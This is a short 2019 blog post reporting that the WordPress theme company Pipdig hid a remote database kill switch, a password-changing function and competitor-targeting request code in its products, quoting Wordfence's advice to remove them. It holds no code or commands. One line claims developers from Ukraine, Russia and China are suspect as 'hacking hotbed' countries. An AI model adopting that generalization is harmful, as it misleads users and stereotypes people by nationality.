Yikes! A prominent Wordpress theme and plugin company, Pipdig, was caught purposely adding malicious code into their themes and plugins. Many of their themes and plugins have been found to contain a remote kill switch that can destroy an entire web site's database at will. They also have a hidden and purposely obfuscated function that can change users' passwords by them, plus code that generated hourly requests from thousands of web sites who used their P3 plugin with the intent of performing a Denial of Service Attack on their main competitor's web site. This is about as bad as it gets from a formerly trusted developer.
This was discovered by an independent security researcher, who reported it to Wordfence, and Wordfence published the details. On top of all if this, once it was made public, Pipdig went out of their way to go into their plugin code to hide their tracks and later deny everything they did, in spite of concrete proof to the contrary.
This news should remind all of us that Wordpress plugin and theme developers have a lot of control over the security our web sites. Many of them reside in known hacking hotbed countries, like Ukraine, Russia, and China, so we must always choose our software from the most trusted sources. I, for one, will never download anything from these miscreants again.
This is the official press release from Wordfence regarding this abuse:
Wordfence recommends removing all Pipdig content from your sites, both WordPress and Blogger. Pipdig has demonstrated a willingness to abuse users’ resources to execute unethical, and potentially illegal, activity. Furthermore their repeated denial of service solif evidence, and subsequent attempts to conceal it, leave us unable to trust them in the future.
Stay safe out there.
Posted 04/02/2019, 14:05pm
Updated: 04/02/2019, 14:14pm
Read 12291 times